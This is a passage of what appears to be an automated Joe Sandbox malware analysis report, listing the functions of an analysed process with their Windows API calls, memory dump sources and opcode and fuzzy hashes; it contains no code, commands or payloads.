                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                      Function 0094FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                      Function 0042C263 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 205 42c263-42c2a7 call 404703 call 42d153 RtlFreeHeap
                      APIs
                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C2A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID: ^gA
                      • API String ID: 3298025750-2986628814
                      • Opcode ID: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                      • Instruction ID: 94010e64c3ac40ebaa8637d687da895893a5285f039648f1696056085be2b873
                      • Opcode Fuzzy Hash: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                      • Instruction Fuzzy Hash: 7DE06DB26042047BD610EE99DC41EAB33ACEFC9710F00441AFA18A7242D674B910CAB9
                      Function 00417A83 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 253 417a83-417aa0 254 417a32-417a40 call 42f203 253->254 255 417aa2-417aa4 253->255 258 417a50-417a61 call 42d663 254->258 259 417a42-417a4d call 42f4a3 254->259 264 417a63-417a77 LdrLoadDll 258->264 265 417a7a-417a7d 258->265 259->258 264->265
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                      Memory Dump Source
                      • Source File: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                      • Instruction ID: 5467ce7baa1be35fd542a387db4fa72fba50a4fd1dc026b6fc6d13751b3d1b69
                      • Opcode Fuzzy Hash: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                      • Instruction Fuzzy Hash: B50124B1E04108BBDB10DBA49C52FDFBB78DF11348F1440AAE94893241F635EA05C7A1
                      Function 00417AA5 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 281 417aa5-417ab0 282 417ab2-417abb 281->282 283 417a58-417a61 281->283 286 417aa2-417aa4 282->286 287 417abd-417ac6 282->287 284 417a63-417a77 LdrLoadDll 283->284 285 417a7a-417a7d 283->285 284->285
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                      Memory Dump Source
                      • Source File: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 5de6b12b75050224d6ddde39596448764a2b6bb350762c52e3b39eaf53d6926f
                      • Instruction ID: 649d61dad93b3462b7384ddc33fd9c8a8ef157cfa8b9e39ff11f18283cf64051
                      • Opcode Fuzzy Hash: 5de6b12b75050224d6ddde39596448764a2b6bb350762c52e3b39eaf53d6926f
                      • Instruction Fuzzy Hash: A5F0903920811AAED710CA94CC41FDDBBB4EF45694F04479AE968971C1D631AA498785
                      Function 0042C213 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 288 42c213-42c254 call 404703 call 42d153 RtlAllocateHeap
                      APIs
                      • RtlAllocateHeap.NTDLL(?,0041E3BE,?,?,00000000,?,0041E3BE,?,?,?), ref: 0042C24F
                      Memory Dump Source
                      • Source File: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                      • Instruction ID: bf3421da550d34a33725b684d4c833155ef629d3a1766f7896df30323ebfda8e
                      • Opcode Fuzzy Hash: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                      • Instruction Fuzzy Hash: C3E065B2604304BBD610EE99EC41EEB33ECEFC9754F004019FA08A7241C674B9108AB9
                      Function 0042C2B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 298 42c2b3-42c2ec call 404703 call 42d153 ExitProcess
                      APIs
                      • ExitProcess.KERNELBASE(?), ref: 0042C2E7
                      Memory Dump Source
                      • Source File: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: 692240f82839e6ec99a492d051d73a3b7a6c2aa1fbb4de7833b58e73ace8f1c9
                      • Instruction ID: ca7a2a84a7f801cb252aaa35fdd09469841853465a89a090f00c38a162972b51
                      • Opcode Fuzzy Hash: 692240f82839e6ec99a492d051d73a3b7a6c2aa1fbb4de7833b58e73ace8f1c9
                      • Instruction Fuzzy Hash: EDE04F316442157BC610AA5ADC41FA7B76CDFC5754F50442AFA0867281C675B91187E4

                      Non-executed Functions

                      Function 00940080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID: [Pj
                      • API String ID: 0-2289356113
                      • Opcode ID: 3e7f94cc2da24c32d0ade6172cbbcea62c5ecd7dd82098597002bd0b916f9aef
                      • Instruction ID: 728237ca5a8fdf23bd3720ca9df7fdccb922d8dc4a9b5165ccd6a035e181bad8
                      • Opcode Fuzzy Hash: 3e7f94cc2da24c32d0ade6172cbbcea62c5ecd7dd82098597002bd0b916f9aef
                      • Instruction Fuzzy Hash: 01F09031208304BBEB22AB50CC85F3A7BA9BFD5754F14C818FA456A193C776C821E722
                      Function 009626F8 Relevance: .0, Instructions: 44COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                      • Instruction ID: 427099a31742f06c2784d45317e114aeb2b677ece39d72eeb184b4fb9f12223f
                      • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                      • Instruction Fuzzy Hash: E1F0C2313289599BDB48EB289D55F6A33D9EBA4300F58C439ED49CB341D635FD408390
                      Function 009A0101 Relevance: .0, Instructions: 31COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                      • Instruction ID: 4bf22ffebc8b4393b4e91f05e9fce10ae1cf02d57b774a255482d5ab2bef5e64
                      • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                      • Instruction Fuzzy Hash: C1F082722482059FCB5CCF04C490BF937B6ABD6719F64443CE50B8F690D7399841CAD5
                      Function 009400EA Relevance: .0, Instructions: 20COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f40cec25a573549bcfc6327304554cbbf3fd344b660c1e0f01bf4c5ee16ae4df
                      • Instruction ID: fb6f700a09c82b37d12f8c6d9790a69cc27804db1b67d53c461481dec9fd5802
                      • Opcode Fuzzy Hash: f40cec25a573549bcfc6327304554cbbf3fd344b660c1e0f01bf4c5ee16ae4df
                      • Instruction Fuzzy Hash: 1AE01A72549B81CBD321DF54D901F1AB3E4FFC8B10F15483AF40A9B750D7789A05C962
                      Function 009500C4 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                      Function 00950048 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                      • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                      • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                      • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                      Function 00950078 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                      • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                      • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                      • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                      Function 00950060 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                      • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                      • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                      • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                      Function 009501D4 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                      • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                      • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                      • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                      Function 0095010C Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                      • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                      • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                      • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                      Function 00950C40 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                      • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                      • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                      • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                      Function 009510D0 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                      • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                      • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                      • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                      Function 00951148 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                      • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                      • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                      • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                      Function 0094F8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
